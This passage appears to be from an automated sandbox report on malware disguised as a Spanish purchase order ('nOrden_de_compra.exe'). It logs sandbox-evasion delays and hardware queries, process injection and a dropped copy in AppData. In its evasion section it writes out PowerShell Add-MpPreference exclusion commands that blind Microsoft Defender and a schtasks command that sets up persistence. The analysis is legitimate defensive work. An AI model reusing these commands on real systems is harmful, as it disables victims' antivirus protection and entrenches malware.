                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97937s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97828s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97718s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97608s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe TID: 2244Thread sleep time: -97500s >= -30000s
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 100000Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99890Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99781Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99671Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99562Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99453Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99342Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99234Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99125Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99015Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98902Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98796Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98686Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98578Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98468Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98359Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98250Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98140Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98031Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97921Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97812Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97702Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97593Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97484Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97375Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97265Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97156Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 97046Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96937Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96828Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96718Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96609Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96500Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96390Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96281Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96171Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 96062Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 95953Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99968Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99854Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99749Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99640Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99531Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99421Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99312Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99203Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 99093Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98984Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98875Jump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeThread delayed: delay time: 98765Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 100000
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99875
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99765
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99656
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99547
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99437
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99328
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99219
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99108
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99000
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98891
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98781
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98672
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98563
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98438
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98313
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98203
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98094
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97969
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97859
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97750
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97641
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97531
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97422
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97312
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97203
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97094
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 96969
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99968
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99859
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99750
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99640
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99531
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99422
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99312
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99203
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 99076
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98968
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98859
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98749
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98640
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98527
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98273
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98156
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 98046
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97937
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97828
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97718
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97608
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeThread delayed: delay time: 97500
                      Source: nOrden_de_compra.exe, 00000000.00000002.2116285224.0000000006F20000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: od_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: nNdsLvHyWi.exe, 0000000B.00000002.2145604750.0000000000AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: nNdsLvHyWi.exe, 0000000F.00000002.4527302834.0000000000BE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll=
                      Source: nOrden_de_compra.exe, 0000000A.00000002.4527441718.00000000011D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeMemory written: C:\Users\user\Desktop\nOrden_de_compra.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeMemory written: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpD5F2.tmpJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeProcess created: C:\Users\user\Desktop\nOrden_de_compra.exe C:\Users\user\Desktop\nOrden_de_compra.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nNdsLvHyWi" /XML "C:\Users\user\AppData\Local\Temp\tmpE302.tmpJump to behavior
                      Source: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeProcess created: C:\Users\user\AppData\Roaming\nNdsLvHyWi.exe C:\Users\user\AppData\Roaming\nNdsLvHyWi.exeJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Users\user\Desktop\nOrden_de_compra.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\nOrden_de_compra.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
